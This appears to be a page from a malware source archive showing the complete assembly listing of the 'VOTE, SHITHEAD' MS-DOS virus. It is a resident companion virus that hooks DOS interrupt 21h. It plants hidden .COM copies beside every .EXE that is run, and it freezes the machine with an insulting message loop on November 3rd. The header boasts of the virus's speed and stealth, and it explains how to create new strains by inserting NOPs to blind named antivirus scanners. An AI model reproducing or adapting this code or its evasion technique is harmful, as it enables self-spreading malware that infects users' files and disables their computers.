MalwareSourceCode/MSDOS/L-Index/Virus.MSDOS.Unknown.lb-349.asm

319 lines
11 KiB
NASM
Raw Normal View History

2022-08-21 09:07:57 +00:00
;****************************************************************************
;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7.
;*
;* TASM/MASM compatible source listing
;*
;* VOTE, SHITHEAD is a resident, companion virus based upon Little
;* Brother code and library .asm routines extracted from Nowhere Man's VCL.
;* It is also 'patched' with three 'nops' (they are commented) which
;* effectively blind a number of a-v scanners. This simple alteration
;* demonstrates a practical benefit of source code possession: quick
;* generation of different virus strains becomes a task within anyone's
;* reach. The only tools needed are a number of virus scanners and patience.
;*
;* In any case, the VOTE virus is just the ideal sample needed for
;* judicious virus action. It is a PERFECT tool for viral spreading for
;* a number of reasons. First, it is a FAST infector. Once resident
;* VOTE will create a companion file for ANY .EXE executed on ANY drive
;* and it will do it so quickly that most users, even suspicious ones,
;* will not notice any slowdown or glitches in machine operation.
;* Second, 'companion-ed' .EXE's will continue to load and function
;* properly when VOTE is resident. At the start of the day's computing,
;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus
;* becomes resident. If it is re-called it will function perfectly.
;* Third, VOTE like the INSUFF viruses in the last newsletter strikes
;* directly at anti-virus suites vulnerable to 'spawning' infections (many
;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement
;* over the original virus's modus operandi which left them out in plane
;* sight in the directory. Last, VOTE is very small. In RAM, it is not
;* discernible, taking up slightly less that 0.25k. Characteristically,
;* this is NOT reported by a mem /c display. In fact,
;* VOTE is almost invisible to any number of standard diagnostic
;* tests. Memory maps by QEMM and Norton's SYSINFO will
;* report INT 21 hooked differently. But unless the user can compare
;* an uncontaminated INTERRUPT report with one when the virus IS present,
;* it's unlikely he'll know anything is different. Even then, VOTE is hard
;* to notice.
;*
;* On election day, November 3rd, VOTE will lock an infected machine into
;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively
;* across the monitor. Computing will be impossible on Nov. 3rd
;* unless VOTE is removed from the machine, a task accomplished by unmasking
;* all the hidden .COMfiles and deleting them while
;* the virus is NOT resident. At all other times, VOTE is almost completely
;* transparent.
;****************************************************************************
code segment
assume cs:code,ds:code,es:nothing
.RADIX 16
oi21 equ endit
nameptr equ endit+4
DTA equ endit+8
;****************************************************************************
;* Check for activation date, then proceed to installation!
;****************************************************************************
org 100h
begin:
call get_day ; Get the day, DOS time/date grab
cmp ax,0003h ; Did the function return the 3rd?
jne realstrt ; If equal, continue along stream
call get_month ; Get the month, DOS time/date grab
cmp ax,000Bh ; Did the function return November (11)?
jne realstrt ; If equal, continue to blooie; if not
; skip to loading of virus
blooie: mov dx, offset shithead ;load 'shithead' message
mov ah,9 ;display it and loop
int 21h ;endlessly until
jmp blooie ;user becomes ill and reboots
realstrt: mov ax,0044h ;move VOTE SHITHEAD to empty hole in RAM
nop ;a 'nop' to confuse tbSCAN
mov es,ax
nop ;a 'nop' to confuse Datatechnik's AVscan
mov di,0100h
mov si,di
mov cx,endit - begin ;length of SHITHEAD into cx
rep movsb
mov ds,cx ;get original int21 vector
mov si,0084h
mov di,offset oi21
mov dx,offset ni21
lodsw
cmp ax,dx ;check to see if virus is around
je cancel ; by comparing new interrupt (ni21)
stosw ; vector to current, if it looks
movsw ; the same 'cancel' operation
push es ;set vector to new handler
pop ds
mov ax,2521h
int 21h
cancel: ret
;****************************************************************************
;* File-extension masks for checking and naming routines;message text
;****************************************************************************
EXE_txt db 'EXE',0
COM_txt db 'COM',0
SHITHEAD db "DID YOU VOTE, SHITHEAD??"
db 07h,07h,'$'
;****************************************************************************
;* Interrupt handler 24
;****************************************************************************
ni24: mov al,03 ;virus critical error handler
iret ;prevents embarrassing messages
;on attempted writes to protected disks
;****************************************************************************
;* Interrupt handler 21
;****************************************************************************
ni21: pushf
push es
push ds
push ax
push bx
push dx
cmp ax,4B00h ;now that we're installed
jne exit ; check for 4B00, DOS excutions
doit: call infect ; if one comes by, grab it
exit: pop dx ; if anything else, goto sleep
pop bx
pop ax
pop ds
pop es
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
;****************************************************************************
;* Try to infect a file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov word ptr cs:[nameptr],dx ;save the ptr to the filename
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ;get old DTA
int 21
push es
push bx
push cs ;set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21
call searchpoint ; here's where we grab a name
push di ; for ourselves
mov si,offset COM_txt ;is extension 'COM'?
mov cx,3
rep cmpsb
pop di
jz do_com ;if so, go to our .COM routine
mov si,offset EXE_txt ;is extension 'EXE'?
nop ;'nop' to confuse SCAN v95b.
mov cl,3
rep cmpsb
jnz return
do_exe: mov si,offset COM_txt ;change extension to COM
nop ;another 'nop' to confuse SCAN
call change_ext
mov ax,3300h ;get ctrl-break flag
nop
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vector to new handler
pop ds ;virus handles machine
mov dx,offset ni24 ;exits on attempted writes
mov ah,25h ;to write-protected disks
push ax
int 21
lds dx,dword ptr [nameptr] ;create the virus (with name of .EXE target)
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h ; makes it hidden/system/read-only
; do it
xchg bx,ax ;save handle
push cs
pop ds
mov cx,endit - begin ; write the virus to the created file
mov dx,offset begin ; CX contains length
mov ah,40h ; write to file function
int 21
mov ah,3Eh ;close the file
int 21
return1: pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
mov si,offset EXE_txt ;change extension to EXE
call change_ext ;execute EXE-file
return: mov ah,1Ah ;restore old DTA
pop dx
pop ds
int 21
ret
do_com: call findfirst ;is the COM-file a virus?
cmp word ptr cs:[DTA+1Ah],endit - begin ;compare it to virus length
jne return ;no, so execute COM-file
mov si,offset EXE_txt ;does the EXE-variant exist?
call change_ext
call findfirst
jnc return ;yes, execute EXE-file
mov si,offset COM_txt ;change extension to COM
call change_ext
jmp short return ;execute COM-file
;****************************************************************************
;* Search beginning of extension for name we will usurp
;****************************************************************************
searchpoint: les di,dword ptr cs:[nameptr]
mov ch,0FFh
mov al,0
repnz scasb
sub di,4
ret
;****************************************************************************
;* Change the extension of the filename (CS:SI -> ext)
;****************************************************************************
change_ext: call searchpoint
push cs
pop ds
movsw
movsw
ret
;****************************************************************************
;* Find the file
;****************************************************************************
findfirst: lds dx,dword ptr [nameptr]
mov cl,27h
mov ah,4Eh
int 21
ret
;****************************************************************************
;* Get the day off the system for activation checking
;****************************************************************************
get_day:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
;*************************************************************************
;* Get the month off the system for activation checking
;*************************************************************************
get_month:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dh ; Copy month into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
endit:
code ends
end begin
2021-01-12 23:47:04 +00:00